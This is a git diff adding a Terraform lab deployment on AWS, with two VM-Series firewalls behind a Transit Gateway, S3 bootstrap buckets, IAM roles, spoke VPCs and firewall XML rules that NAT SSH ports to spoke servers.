+                </tcp>
+              </protocol>
+            </entry>
+            <entry name="tcp-2002">
+              <protocol>
+                <tcp>
+                  <port>2002</port>
+                  <override>
+                    <no/>
+                  </override>
+                </tcp>
+              </protocol>
+            </entry>
+            <entry name="tcp-1002">
+              <protocol>
+                <tcp>
+                  <port>1002</port>
+                  <override>
+                    <no/>
+                  </override>
+                </tcp>
+              </protocol>
+            </entry>
+          </service>
+          <service-group/>
+          <schedule/>
+          <rulebase>
+            <security>
+              <rules>
+                <entry name="inbound-ssh">
+                  <to>
+                    <member>trust-zone</member>
+                  </to>
+                  <from>
+                    <member>untrust-zone</member>
+                  </from>
+                  <source>
+                    <member>any</member>
+                  </source>
+                  <destination>
+                    <member>any</member>
+                  </destination>
+                  <source-user>
+                    <member>any</member>
+                  </source-user>
+                  <category>
+                    <member>any</member>
+                  </category>
+                  <application>
+                    <member>ssh</member>
+                  </application>
+                  <service>
+                    <member>tcp-1001</member>
+                    <member>tcp-1002</member>
+                    <member>tcp-2001</member>
+                    <member>tcp-2002</member>
+                  </service>
+                  <hip-profiles>
+                    <member>any</member>
+                  </hip-profiles>
+                  <action>allow</action>
+                  <log-start>yes</log-start>
+                </entry>
+                <entry name="spoke1-to-spoke2">
+                  <to>
+                    <member>trust-zone</member>
+                  </to>
+                  <from>
+                    <member>trust-zone</member>
+                  </from>
+                  <source>
+                    <member>any</member>
+                  </source>
+                  <destination>
+                    <member>any</member>
+                  </destination>
+                  <source-user>
+                    <member>any</member>
+                  </source-user>
+                  <category>
+                    <member>any</member>
+                  </category>
+                  <application>
+                    <member>any</member>
+                  </application>
+                  <service>
+                    <member>any</member>
+                  </service>
+                  <hip-profiles>
+                    <member>any</member>
+                  </hip-profiles>
+                  <action>allow</action>
+                </entry>
+                <entry name="outbound">
+                  <to>
+                    <member>untrust-zone</member>
+                  </to>
+                  <from>
+                    <member>trust-zone</member>
+                  </from>
+                  <source>
+                    <member>any</member>
+                  </source>
+                  <destination>
+                    <member>any</member>
+                  </destination>
+                  <source-user>
+                    <member>any</member>
+                  </source-user>
+                  <category>
+                    <member>any</member>
+                  </category>
+                  <application>
+                    <member>any</member>
+                  </application>
+                  <service>
+                    <member>any</member>
+                  </service>
+                  <hip-profiles>
+                    <member>any</member>
+                  </hip-profiles>
+                  <action>allow</action>
+                </entry>
+                <entry name="deny-all">
+                  <to>
+                    <member>any</member>
+                  </to>
+                  <from>
+                    <member>any</member>
+                  </from>
+                  <source>
+                    <member>any</member>
+                  </source>
+                  <destination>
+                    <member>any</member>
+                  </destination>
+                  <source-user>
+                    <member>any</member>
+                  </source-user>
+                  <category>
+                    <member>any</member>
+                  </category>
+                  <application>
+                    <member>any</member>
+                  </application>
+                  <service>
+                    <member>any</member>
+                  </service>
+                  <hip-profiles>
+                    <member>any</member>
+                  </hip-profiles>
+                  <action>deny</action>
+                </entry>
+              </rules>
+            </security>
+            <nat>
+              <rules>
+                <entry name="NAT_OUT">
+                  <source-translation>
+                    <dynamic-ip-and-port>
+                      <interface-address>
+                        <interface>ethernet1/1</interface>
+                      </interface-address>
+                    </dynamic-ip-and-port>
+                  </source-translation>
+                  <to>
+                    <member>untrust-zone</member>
+                  </to>
+                  <from>
+                    <member>trust-zone</member>
+                  </from>
+                  <source>
+                    <member>any</member>
+                  </source>
+                  <destination>
+                    <member>any</member>
+                  </destination>
+                  <service>any</service>
+                </entry>
+                <entry name="NAT_IN_SPOKE1-1">
+                  <to>
+                    <member>untrust-zone</member>
+                  </to>
+                  <from>
+                    <member>untrust-zone</member>
+                  </from>
+                  <source>
+                    <member>any</member>
+                  </source>
+                  <destination>
+                    <member>untrust-fw2</member>
+                  </destination>
+                  <service>tcp-1001</service>
+                  <source-translation>
+                    <dynamic-ip-and-port>
+                      <interface-address>
+                        <interface>ethernet1/2</interface>
+                      </interface-address>
+                    </dynamic-ip-and-port>
+                  </source-translation>
+                  <destination-translation>
+                    <translated-port>22</translated-port>
+                    <translated-address>10.1.0.4</translated-address>
+                  </destination-translation>
+                </entry>
+                <entry name="NAT_IN_SPOKE1-2">
+                  <to>
+                    <member>untrust-zone</member>
+                  </to>
+                  <from>
+                    <member>untrust-zone</member>
+                  </from>
+                  <source>
+                    <member>any</member>
+                  </source>
+                  <destination>
+                    <member>untrust-fw2</member>
+                  </destination>
+                  <service>tcp-1002</service>
+                  <source-translation>
+                    <dynamic-ip-and-port>
+                      <interface-address>
+                        <interface>ethernet1/2</interface>
+                      </interface-address>
+                    </dynamic-ip-and-port>
+                  </source-translation>
+                  <destination-translation>
+                    <translated-port>22</translated-port>
+                    <translated-address>10.1.1.4</translated-address>
+                  </destination-translation>
+                </entry>
+                <entry name="NAT_IN_SPOKE2-1">
+                  <to>
+                    <member>untrust-zone</member>
+                  </to>
+                  <from>
+                    <member>untrust-zone</member>
+                  </from>
+                  <source>
+                    <member>any</member>
+                  </source>
+                  <destination>
+                    <member>untrust-fw2</member>
+                  </destination>
+                  <service>tcp-2001</service>
+                  <source-translation>
+                    <dynamic-ip-and-port>
+                      <interface-address>
+                        <interface>ethernet1/2</interface>
+                      </interface-address>
+                    </dynamic-ip-and-port>
+                  </source-translation>
+                  <destination-translation>
+                    <translated-port>22</translated-port>
+                    <translated-address>10.2.0.4</translated-address>
+                  </destination-translation>
+                </entry>
+                <entry name="NAT_IN_SPOKE2-2">
+                  <to>
+                    <member>untrust-zone</member>
+                  </to>
+                  <from>
+                    <member>untrust-zone</member>
+                  </from>
+                  <source>
+                    <member>any</member>
+                  </source>
+                  <destination>
+                    <member>untrust-fw2</member>
+                  </destination>
+                  <service>tcp-2002</service>
+                  <source-translation>
+                    <dynamic-ip-and-port>
+                      <interface-address>
+                        <interface>ethernet1/2</interface>
+                      </interface-address>
+                    </dynamic-ip-and-port>
+                  </source-translation>
+                  <destination-translation>
+                    <translated-port>22</translated-port>
+                    <translated-address>10.2.1.4</translated-address>
+                  </destination-translation>
+                </entry>
+              </rules>
+            </nat>
+            <default-security-rules>
+              <rules>
+                <entry name="intrazone-default">
+                  <action>allow</action>
+                  <log-start>no</log-start>
+                  <log-end>yes</log-end>
+                </entry>
+                <entry name="interzone-default">
+                  <action>deny</action>
+                  <log-start>no</log-start>
+                  <log-end>yes</log-end>
+                </entry>
+              </rules>
+            </default-security-rules>
+          </rulebase>
+          <import>
+            <network>
+              <interface>
+                <member>ethernet1/1</member>
+                <member>ethernet1/2</member>
+              </interface>
+            </network>
+          </import>
+          <address>
+            <entry name="untrust-fw2">
+              <ip-netmask>192.168.11.4</ip-netmask>
+            </entry>
+          </address>
+          <tag>
+            <entry name="untrust-zone">
+              <color>color6</color>
+            </entry>
+            <entry name="trust-zone">
+              <color>color13</color>
+            </entry>
+          </tag>
+        </entry>
+      </vsys>
+    </entry>
+  </devices>
+</config>
diff --git a/aws/tgw_2fw_vpc_insertion/bootstrap_files/fw2/init-cfg.txt b/aws/tgw_2fw_vpc_insertion/bootstrap_files/fw2/init-cfg.txt
new file mode 100644
index 00000000..2fd77546
--- /dev/null
+++ b/aws/tgw_2fw_vpc_insertion/bootstrap_files/fw2/init-cfg.txt
@@ -0,0 +1,18 @@
+type=dhcp-client
+ip-address=
+default-gateway=
+netmask=
+ipv6-address=
+ipv6-default-gateway=
+hostname=vmseries-fw2
+panorama-server=
+panorama-server-2=
+tplname=
+dgname=
+dns-primary=
+dns-secondary=
+op-command-modes=mgmt-interface-swap
+dhcp-send-hostname=yes
+dhcp-send-client-id=yes
+dhcp-accept-server-hostname=no
+dhcp-accept-server-domain=yes
diff --git a/aws/tgw_2fw_vpc_insertion/create_s3_bootstrap.tf b/aws/tgw_2fw_vpc_insertion/create_s3_bootstrap.tf
new file mode 100644
index 00000000..cb138478
--- /dev/null
+++ b/aws/tgw_2fw_vpc_insertion/create_s3_bootstrap.tf
@@ -0,0 +1,161 @@
+#************************************************************************************
+# CREATE 2 S3 BUCKETS FOR FW1 & FW2
+#************************************************************************************
+resource "random_string" "randomstring" {
+  length      = 25
+  min_lower   = 15
+  min_numeric = 10
+  special     = false
+}
+
+resource "aws_s3_bucket" "bootstrap_bucket_fw1" {
+  bucket        = "${join("", list(var.bootstrap_s3bucket1_create, "-", random_string.randomstring.result))}"
+  acl           = "private"
+  force_destroy = true
+}
+
+resource "aws_s3_bucket" "bootstrap_bucket_fw2" {
+  bucket        = "${join("", list(var.bootstrap_s3bucket2_create, "-", random_string.randomstring.result))}"
+  acl           = "private"
+  force_destroy = true
+}
+
+
+#************************************************************************************
+# CREATE FW1 DIRECTORIES & UPLOAD FILES FROM /bootstrap_files/fw1 DIRECTORY
+#************************************************************************************
+resource "aws_s3_bucket_object" "bootstrap_xml" {
+  bucket = "${aws_s3_bucket.bootstrap_bucket_fw1.id}"
+  acl    = "private"
+  key    = "config/bootstrap.xml"
+  source = "bootstrap_files/fw1/bootstrap.xml"
+}
+
+resource "aws_s3_bucket_object" "init-cft_txt" {
+  bucket = "${aws_s3_bucket.bootstrap_bucket_fw1.id}"
+  acl    = "private"
+  key    = "config/init-cfg.txt"
+  source = "bootstrap_files/fw1/init-cfg.txt"
+}
+
+resource "aws_s3_bucket_object" "software" {
+  bucket = "${aws_s3_bucket.bootstrap_bucket_fw1.id}"
+  acl    = "private"
+  key    = "software/"
+  source = "/dev/null"
+}
+
+resource "aws_s3_bucket_object" "license" {
+  bucket = "${aws_s3_bucket.bootstrap_bucket_fw1.id}"
+  acl    = "private"
+  key    = "license/authcodes"
+  source = "bootstrap_files/fw1/authcodes"
+}
+
+resource "aws_s3_bucket_object" "content" {
+  bucket = "${aws_s3_bucket.bootstrap_bucket_fw1.id}"
+  acl    = "private"
+  key    = "content/"
+  source = "/dev/null"
+}
+
+
+#************************************************************************************
+# CREATE FW2 DIRECTORIES & UPLOAD FILES FROM /bootstrap_files/fw2 DIRECTORY
+#************************************************************************************
+resource "aws_s3_bucket_object" "bootstrap_xml2" {
+  bucket = "${aws_s3_bucket.bootstrap_bucket_fw2.id}"
+  acl    = "private"
+  key    = "config/bootstrap.xml"
+  source = "bootstrap_files/fw2/bootstrap.xml"
+}
+
+resource "aws_s3_bucket_object" "init-cft_txt2" {
+  bucket = "${aws_s3_bucket.bootstrap_bucket_fw2.id}"
+  acl    = "private"
+  key    = "config/init-cfg.txt"
+  source = "bootstrap_files/fw2/init-cfg.txt"
+}
+
+resource "aws_s3_bucket_object" "software2" {
+  bucket = "${aws_s3_bucket.bootstrap_bucket_fw2.id}"
+  acl    = "private"
+  key    = "software/"
+  source = "/dev/null"
+}
+
+resource "aws_s3_bucket_object" "license2" {
+  bucket = "${aws_s3_bucket.bootstrap_bucket_fw2.id}"
+  acl    = "private"
+  key    = "license/authcodes"
+  source = "bootstrap_files/fw2/authcodes"
+}
+
+resource "aws_s3_bucket_object" "content2" {
+  bucket = "${aws_s3_bucket.bootstrap_bucket_fw2.id}"
+  acl    = "private"
+  key    = "content/"
+  source = "/dev/null"
+}
+
+
+#************************************************************************************
+# CREATE & ASSIGN IAM ROLE, POLICY, & INSTANCE PROFILE
+#************************************************************************************
+resource "aws_iam_role" "bootstrap_role" {
+  name = "ngfw_bootstrap_role"
+
+  assume_role_policy = <<EOF
+{
+  "Version": "2012-10-17",
+  "Statement": [
+    {
+      "Effect": "Allow",
+      "Principal": {
+      "Service": "ec2.amazonaws.com"
+    },
+      "Action": "sts:AssumeRole"
+    }
+  ]
+}
+EOF
+}
+
+resource "aws_iam_role_policy" "bootstrap_policy" {
+  name = "ngfw_bootstrap_policy"
+  role = "${aws_iam_role.bootstrap_role.id}"
+
+  policy = <<EOF
+{
+  "Version" : "2012-10-17",
+  "Statement": [
+    {
+      "Effect": "Allow",
+      "Action": "s3:ListBucket",
+      "Resource": "arn:aws:s3:::${aws_s3_bucket.bootstrap_bucket_fw1.id}"
+    },
+    {
+      "Effect": "Allow",
+      "Action": "s3:GetObject",
+      "Resource": "arn:aws:s3:::${aws_s3_bucket.bootstrap_bucket_fw1.id}/*"
+    },
+    {
+      "Effect": "Allow",
+      "Action": "s3:ListBucket",
+      "Resource": "arn:aws:s3:::${aws_s3_bucket.bootstrap_bucket_fw2.id}"
+    },
+    {
+      "Effect": "Allow",
+      "Action": "s3:GetObject",
+      "Resource": "arn:aws:s3:::${aws_s3_bucket.bootstrap_bucket_fw2.id}/*"
+    }
+  ]
+}
+EOF
+}
+
+resource "aws_iam_instance_profile" "bootstrap_profile" {
+  name = "ngfw_bootstrap_profile"
+  role = "${aws_iam_role.bootstrap_role.name}"
+  path = "/"
+}
diff --git a/aws/tgw_2fw_vpc_insertion/create_tgw.tf b/aws/tgw_2fw_vpc_insertion/create_tgw.tf
new file mode 100644
index 00000000..50c82cd3
--- /dev/null
+++ b/aws/tgw_2fw_vpc_insertion/create_tgw.tf
@@ -0,0 +1,60 @@
+#************************************************************************************
+# CREATE TGW
+#************************************************************************************
+resource "aws_ec2_transit_gateway" "tgw" {
+  description                     = "Transit Gateway"
+  vpn_ecmp_support                = "enable"
+  default_route_table_association = "disable"
+  default_route_table_propagation = "disable"
+  dns_support                     = "enable"
+  auto_accept_shared_attachments  = "disable"
+
+  tags {
+    Name = "tgw"
+  }
+}
+
+#************************************************************************************
+# CREATE TGW ROUTE TABLES
+#************************************************************************************
+resource "aws_ec2_transit_gateway_route_table" "tgw_security" {
+  transit_gateway_id = "${aws_ec2_transit_gateway.tgw.id}"
+
+  tags {
+    Name = "tgw-rtb-security"
+  }
+}
+
+resource "aws_ec2_transit_gateway_route_table" "tgw_spokes" {
+  transit_gateway_id = "${aws_ec2_transit_gateway.tgw.id}"
+
+  tags {
+    Name = "tgw-rtb-spokes"
+  }
+}
+
+#************************************************************************************
+# CREATE ROUTES FOR TGW ROUTE TABLES
+#************************************************************************************
+resource "aws_ec2_transit_gateway_route" "default" {
+  destination_cidr_block         = "0.0.0.0/0"
+  transit_gateway_attachment_id  = "${aws_ec2_transit_gateway_vpc_attachment.tgw_security.id}"
+  transit_gateway_route_table_id = "${aws_ec2_transit_gateway_route_table.tgw_spokes.id}"
+}
+
+resource "aws_ec2_transit_gateway_route_table_association" "vpc_security" {
+  transit_gateway_attachment_id  = "${aws_ec2_transit_gateway_vpc_attachment.tgw_security.id}"
+  transit_gateway_route_table_id = "${aws_ec2_transit_gateway_route_table.tgw_security.id}"
+}
+
+resource "aws_ec2_transit_gateway_vpc_attachment" "tgw_security" {
+  vpc_id                                          = "${aws_vpc.vpc_security.id}"
+  subnet_ids                                      = ["${aws_subnet.vpc_security_tgw_1.id}", "${aws_subnet.vpc_security_tgw_2.id}"]
+  transit_gateway_id                              = "${aws_ec2_transit_gateway.tgw.id}"
+  transit_gateway_default_route_table_association = false
+  transit_gateway_default_route_table_propagation = false
+
+  tags {
+    Name = "fw-vpc-attachment"
+  }
+}
diff --git a/aws/tgw_2fw_vpc_insertion/create_vpc_security.tf b/aws/tgw_2fw_vpc_insertion/create_vpc_security.tf
new file mode 100644
index 00000000..8a2c0b31
--- /dev/null
+++ b/aws/tgw_2fw_vpc_insertion/create_vpc_security.tf
@@ -0,0 +1,401 @@
+data "aws_availability_zones" "available" {}
+
+
+
+#************************************************************************************
+# CREATE SECURITY VPC & SUBNETS
+#************************************************************************************
+resource "aws_vpc" "vpc_security" {
+  cidr_block = "${var.vpc_security_cidr}"
+
+  tags {
+    Name = "fw-vpc"
+  }
+}
+
+resource "aws_subnet" "vpc_security_mgmt_1" {
+  vpc_id            = "${aws_vpc.vpc_security.id}"
+  cidr_block        = "${var.vpc_security_subnet_mgmt_1}"
+  availability_zone = "${data.aws_availability_zones.available.names[0]}"
+
+  tags {
+    Name = "mgmt-fw1"
+  }
+}
+
+resource "aws_subnet" "vpc_security_mgmt_2" {
+  vpc_id            = "${aws_vpc.vpc_security.id}"
+  cidr_block        = "${var.vpc_security_subnet_mgmt_2}"
+  availability_zone = "${data.aws_availability_zones.available.names[1]}"
+
+  tags {
+    Name = "mgmt-fw2"
+  }
+}
+
+resource "aws_subnet" "vpc_security_public_1" {
+  vpc_id            = "${aws_vpc.vpc_security.id}"
+  cidr_block        = "${var.vpc_security_subnet_public_1}"
+  availability_zone = "${data.aws_availability_zones.available.names[0]}"
+
+  tags {
+    Name = "untrust-fw1"
+  }
+}
+
+resource "aws_subnet" "vpc_security_public_2" {
+  vpc_id            = "${aws_vpc.vpc_security.id}"
+  cidr_block        = "${var.vpc_security_subnet_public_2}"
+  availability_zone = "${data.aws_availability_zones.available.names[1]}"
+
+  tags {
+    Name = "untrust-fw2"
+  }
+}
+
+resource "aws_subnet" "vpc_security_private_1" {
+  vpc_id            = "${aws_vpc.vpc_security.id}"
+  cidr_block        = "${var.vpc_security_subnet_private_1}"
+  availability_zone = "${data.aws_availability_zones.available.names[0]}"
+
+  tags {
+    Name = "trust-fw1"
+  }
+}
+
+resource "aws_subnet" "vpc_security_private_2" {
+  vpc_id            = "${aws_vpc.vpc_security.id}"
+  cidr_block        = "${var.vpc_security_subnet_private_2}"
+  availability_zone = "${data.aws_availability_zones.available.names[1]}"
+
+  tags {
+    Name = "trust-fw2"
+  }
+}
+
+resource "aws_subnet" "vpc_security_tgw_1" {
+  vpc_id            = "${aws_vpc.vpc_security.id}"
+  cidr_block        = "${var.vpc_security_subnet_tgw_1}"
+  availability_zone = "${data.aws_availability_zones.available.names[0]}"
+
+  tags {
+    Name = "tgw-fw1"
+  }
+}
+
+resource "aws_subnet" "vpc_security_tgw_2" {
+  vpc_id            = "${aws_vpc.vpc_security.id}"
+  cidr_block        = "${var.vpc_security_subnet_tgw_2}"
+  availability_zone = "${data.aws_availability_zones.available.names[1]}"
+
+  tags {
+    Name = "tgw-fw2"
+  }
+}
+
+
+#************************************************************************************
+# CREATE IGW FOR SECURITY VPC
+#************************************************************************************
+resource "aws_internet_gateway" "vpc_security_igw" {
+  vpc_id = "${aws_vpc.vpc_security.id}"
+
+  tags {
+    Name = "igw-security-vpc"
+  }
+}
+
+#************************************************************************************
+# CREATE ROUTE TABLES FOR SUBNETS
+#************************************************************************************
+resource "aws_route_table" "vpc_security_mgmt" {
+  vpc_id = "${aws_vpc.vpc_security.id}"
+
+  tags {
+    Name = "fw-mgmt"
+  }
+}
+
+resource "aws_route_table" "vpc_security_public" {
+  vpc_id = "${aws_vpc.vpc_security.id}"
+
+  tags {
+    Name = "fw-untrust"
+  }
+}
+
+resource "aws_route_table" "vpc_security_private" {
+  vpc_id = "${aws_vpc.vpc_security.id}"
+
+  tags {
+    Name = "fw-to-tgw"
+  }
+}
+
+resource "aws_route_table" "vpc_security_tgw" {
+  vpc_id = "${aws_vpc.vpc_security.id}"
+
+  tags {
+    Name = "fw-from-tgw"
+  }
+}
+
+
+#************************************************************************************
+# CREATE ROUTES FOR SUBNET ROUTE TABLES
+#************************************************************************************
+resource "aws_route" "vpc_security_mgmt" {
+  route_table_id         = "${aws_route_table.vpc_security_mgmt.id}"
+  destination_cidr_block = "0.0.0.0/0"
+  gateway_id             = "${aws_internet_gateway.vpc_security_igw.id}"
+}
+
+resource "aws_route" "vpc_security_public" {
+  route_table_id         = "${aws_route_table.vpc_security_public.id}"
+  destination_cidr_block = "0.0.0.0/0"
+  gateway_id             = "${aws_internet_gateway.vpc_security_igw.id}"
+}
+
+resource "aws_route" "vpc_security_trust" {
+  route_table_id         = "${aws_route_table.vpc_security_private.id}"
+  destination_cidr_block = "${var.all_spoke_cidr}"
+  transit_gateway_id     = "${aws_ec2_transit_gateway.tgw.id}"
+}
+
+resource "aws_route" "vpc_security_tgw_0" {
+  route_table_id         = "${aws_route_table.vpc_security_tgw.id}"
+  destination_cidr_block = "0.0.0.0/0"
+  network_interface_id   = "${module.ngfw1.eni-trust}"
+}
+
+resource "aws_route" "vpc_security_tgw_1" {
+  route_table_id         = "${aws_route_table.vpc_security_tgw.id}"
+  destination_cidr_block = "${var.all_spoke_cidr}"
+  network_interface_id   = "${module.ngfw2.eni-trust}"
+}
+
+#************************************************************************************
+# ASSOCIATE ROUTE TABLES WITH SUBNETS 
+#************************************************************************************
+resource "aws_route_table_association" "vpc_security_mgmt_1" {
+  subnet_id      = "${aws_subnet.vpc_security_mgmt_1.id}"
+  route_table_id = "${aws_route_table.vpc_security_mgmt.id}"
+}
+
+resource "aws_route_table_association" "vpc_security_mgmt_2" {
+  subnet_id      = "${aws_subnet.vpc_security_mgmt_2.id}"
+  route_table_id = "${aws_route_table.vpc_security_mgmt.id}"
+}
+
+resource "aws_route_table_association" "vpc_security_public_1" {
+  subnet_id      = "${aws_subnet.vpc_security_public_1.id}"
+  route_table_id = "${aws_route_table.vpc_security_public.id}"
+}
+
+resource "aws_route_table_association" "vpc_security_public_2" {
+  subnet_id      = "${aws_subnet.vpc_security_public_2.id}"
+  route_table_id = "${aws_route_table.vpc_security_public.id}"
+}
+
+resource "aws_route_table_association" "vpc_security_private_1" {
+  subnet_id      = "${aws_subnet.vpc_security_private_1.id}"
+  route_table_id = "${aws_route_table.vpc_security_private.id}"
+}
+
+resource "aws_route_table_association" "vpc_security_private_2" {
+  subnet_id      = "${aws_subnet.vpc_security_private_2.id}"
+  route_table_id = "${aws_route_table.vpc_security_private.id}"
+}
+
+resource "aws_route_table_association" "vpc_security_tgw_1" {
+  subnet_id      = "${aws_subnet.vpc_security_tgw_1.id}"
+  route_table_id = "${aws_route_table.vpc_security_tgw.id}"
+}
+
+resource "aws_route_table_association" "vpc_security_tgw_2" {
+  subnet_id      = "${aws_subnet.vpc_security_tgw_2.id}"
+  route_table_id = "${aws_route_table.vpc_security_tgw.id}"
+}
+
+#************************************************************************************
+# CREATE NSGs & NSG RULES FOR FW MANAGEMENT ENI (22, 443, 3978-Panorama)
+#************************************************************************************
+resource "aws_security_group" "mgmt_nsg" {
+  name        = "mgmt_nsg"
+  description = "Allow HTTPS and SSH inbound traffic"
+  vpc_id      = "${aws_vpc.vpc_security.id}"
+}
+
+resource "aws_security_group_rule" "mgmt_nsg_ingress_22" {
+  type        = "ingress"
+  from_port   = 22
+  to_port     = 22
+  protocol    = "tcp"
+  cidr_blocks = ["${var.management_cidr}"]
+
+  security_group_id = "${aws_security_group.mgmt_nsg.id}"
+}
+
+resource "aws_security_group_rule" "mgmt_nsg_ingress_443" {
+  type        = "ingress"
+  from_port   = 443
+  to_port     = 443
+  protocol    = "tcp"
+  cidr_blocks = ["${var.management_cidr}"]
+
+  security_group_id = "${aws_security_group.mgmt_nsg.id}"
+}
+
+resource "aws_security_group_rule" "mgmt_nsg_ingress_3978" {
+  type        = "ingress"
+  from_port   = 3978
+  to_port     = 3978
+  protocol    = "tcp"
+  cidr_blocks = ["${var.management_cidr}"]
+
+  security_group_id = "${aws_security_group.mgmt_nsg.id}"
+}
+
+resource "aws_security_group_rule" "mgmt_nsg_egress" {
+  type        = "egress"
+  from_port   = 0
+  to_port     = 0
+  protocol    = "-1"
+  cidr_blocks = ["0.0.0.0/0"]
+
+  security_group_id = "${aws_security_group.mgmt_nsg.id}"
+}
+
+
+#************************************************************************************
+# CREATE NSG & NSG RULES FOR FW DATAPLANE ENIs
+#************************************************************************************
+resource "aws_security_group" "data_nsg" {
+  name        = "data_nsg"
+  description = "Allow all inbound traffic"
+  vpc_id      = "${aws_vpc.vpc_security.id}"
+}
+
+resource "aws_security_group_rule" "data_nsg_ingress" {
+  type        = "ingress"
+  from_port   = 0
+  to_port     = 0
+  protocol    = "-1"
+  cidr_blocks = ["0.0.0.0/0"]
+
+  security_group_id = "${aws_security_group.data_nsg.id}"
+}
+
+resource "aws_security_group_rule" "data_nsg_egress" {
+  type        = "egress"
+  from_port   = 0
+  to_port     = 0
+  protocol    = "-1"
+  cidr_blocks = ["0.0.0.0/0"]
+
+  security_group_id = "${aws_security_group.data_nsg.id}"
+}
+
+
+#************************************************************************************
+# CREATE FW1
+#************************************************************************************
+module "ngfw1" {
+  source = "./modules/vm-series/"
+
+  name = "vmseries-fw1"
+
+  aws_key = "${var.aws_key}"
+
+  trust_subnet_id         = "${aws_subnet.vpc_security_private_1.id}"
+  trust_security_group_id = "${aws_security_group.data_nsg.id}"
+  trustfwip               = "${var.fw_ip_subnet_private_1}"
+
+  untrust_subnet_id         = "${aws_subnet.vpc_security_public_1.id}"
+  untrust_security_group_id = "${aws_security_group.data_nsg.id}"
+  untrustfwip               = "${var.fw_ip_subnet_public_1 }"
+
+  management_subnet_id         = "${aws_subnet.vpc_security_mgmt_1.id}"
+  management_security_group_id = "${aws_security_group.mgmt_nsg.id}"
+
+  bootstrap_profile = "${aws_iam_instance_profile.bootstrap_profile.id}"
+  bootstrap_bucket  = "${aws_s3_bucket.bootstrap_bucket_fw1.id}"
+
+  tgw_id = "${aws_ec2_transit_gateway.tgw.id}"
+
+  aws_region        = "${var.aws_region}"
+  ngfw_license_type = "${var.ngfw_license_type}"
+  instance_type     = "${var.instance_type}"
+}
+
+
+#************************************************************************************
+# CREATE FW2
+#************************************************************************************
+module "ngfw2" {
+  source = "./modules/vm-series/"
+
+  name = "vmseries-fw2"
+
+  aws_key = "${var.aws_key}"
+
+  trust_subnet_id         = "${aws_subnet.vpc_security_private_2.id}"
+  trust_security_group_id = "${aws_security_group.data_nsg.id}"
+  trustfwip               = "${var.fw_ip_subnet_private_2}"
+
+  untrust_subnet_id         = "${aws_subnet.vpc_security_public_2.id}"
+  untrust_security_group_id = "${aws_security_group.data_nsg.id}"
+  untrustfwip               = "${var.fw_ip_subnet_public_2 }"
+
+  management_subnet_id         = "${aws_subnet.vpc_security_mgmt_2.id}"
+  management_security_group_id = "${aws_security_group.mgmt_nsg.id}"
+
+  bootstrap_profile = "${aws_iam_instance_profile.bootstrap_profile.id}"
+  bootstrap_bucket  = "${aws_s3_bucket.bootstrap_bucket_fw2.id}"
+
+  tgw_id = "${aws_ec2_transit_gateway.tgw.id}"
+
+  aws_region        = "${var.aws_region}"
+  ngfw_license_type = "${var.ngfw_license_type}"
+  instance_type     = "${var.instance_type}"
+}
+
+output "FW-1-MGMT" {
+  value = "Access the firewall MGMT via:  https://${module.ngfw1.eip_mgmt}"
+}
+
+output "Server-1-1_ngfw1_access" {
+  value = "Access Server 1-1 via FW-1: ssh -i <Insert Key> ubuntu@${module.ngfw1.eip_untrust} -p 1001"
+}
+
+output "Server-1-2_ngfw1_access" {
+  value = "Access Server 1-2 via FW-1: ssh -i <Insert Key> ubuntu@${module.ngfw1.eip_untrust} -p 1002"
+}
+
+output "Server-2-1_ngfw1_access" {
+  value = "Access Server 2-1 via FW-1: ssh -i <Insert Key> ubuntu@${module.ngfw1.eip_untrust} -p 2001"
+}
+
+output "Server-2-2_ngfw1_access" {
+  value = "Access Server 2-2 via FW-1: ssh -i <Insert Key> ubuntu@${module.ngfw1.eip_untrust} -p 2002"
+}
+
+output "FW-2-MGMT" {
+  value = "Access the firewall MGMT via:  https://${module.ngfw2.eip_mgmt}"
+}
+
+output "Server-1-1_ngfw2_access" {
+  value = "Access Server 1-1 via FW-2: ssh -i <Insert Key> ubuntu@${module.ngfw2.eip_untrust} -p 1001"
+}
+
+output "Server-1-2_ngfw2_access" {
+  value = "Access Server 1-2 via FW-2: ssh -i <Insert Key> ubuntu@${module.ngfw2.eip_untrust} -p 1002"
+}
+
+output "Server-2-1_ngfw2_access" {
+  value = "Access Server 2-1 via FW-2: ssh -i <Insert Key> ubuntu@${module.ngfw2.eip_untrust} -p 2001"
+}
+
+output "Server-2-2_ngfw2_access" {
+  value = "Access Server 2-2 via FW-2: ssh -i <Insert Key> ubuntu@${module.ngfw2.eip_untrust} -p 2002"
+}
diff --git a/aws/tgw_2fw_vpc_insertion/create_vpc_spokes.tf b/aws/tgw_2fw_vpc_insertion/create_vpc_spokes.tf
new file mode 100644
index 00000000..2d58f387
--- /dev/null
+++ b/aws/tgw_2fw_vpc_insertion/create_vpc_spokes.tf
@@ -0,0 +1,38 @@
+#************************************************************************************
+# CREATE SPOKE1 VPC & SPOKE1 VMs
+#************************************************************************************
+module "spoke1" {
+  source = "./modules/vm-spoke/"
+
+  pemkey                  = "${var.aws_key}"
+  serverip                = "${var.spoke1_server}"
+  server2ip               = "${var.spoke1_server2}"
+  servername              = "spoke1-vm1"
+  server2name             = "spoke1-vm2"
+  vpc_spoke_cidr          = "${var.spoke1_cidr}"
+  vpc_spoke_subnet_cidr   = "${var.spoke1_subnet}"
+  vpc_spoke_subnet2_cidr  = "${var.spoke1_subnet2}"
+  aws_tgw_id              = "${aws_ec2_transit_gateway.tgw.id}"
+  aws_tgw_spoke_rtb_id    = "${aws_ec2_transit_gateway_route_table.tgw_spokes.id}"
+  aws_tgw_security_rtb_id = "${aws_ec2_transit_gateway_route_table.tgw_security.id}"
+}
+
+
+#************************************************************************************
+# CREATE SPOKE2 VPC & SPOKE2 VMs
+#************************************************************************************
+module "spoke2" {
+  source = "./modules/vm-spoke/"
+
+  pemkey                  = "${var.aws_key}"
+  serverip                = "${var.spoke2_server}"
+  server2ip               = "${var.spoke2_server2}"
+  servername              = "spoke2-vm1"
+  server2name             = "spoke2-vm2"
+  vpc_spoke_cidr          = "${var.spoke2_cidr}"
+  vpc_spoke_subnet_cidr   = "${var.spoke2_subnet}"
+  vpc_spoke_subnet2_cidr  = "${var.spoke2_subnet2}"
+  aws_tgw_id              = "${aws_ec2_transit_gateway.tgw.id}"
+  aws_tgw_spoke_rtb_id    = "${aws_ec2_transit_gateway_route_table.tgw_spokes.id}"
+  aws_tgw_security_rtb_id = "${aws_ec2_transit_gateway_route_table.tgw_security.id}"
+}
diff --git a/aws/tgw_2fw_vpc_insertion/images/diagram.png b/aws/tgw_2fw_vpc_insertion/images/diagram.png
new file mode 100644
index 00000000..e0a33831
Binary files /dev/null and b/aws/tgw_2fw_vpc_insertion/images/diagram.png differ
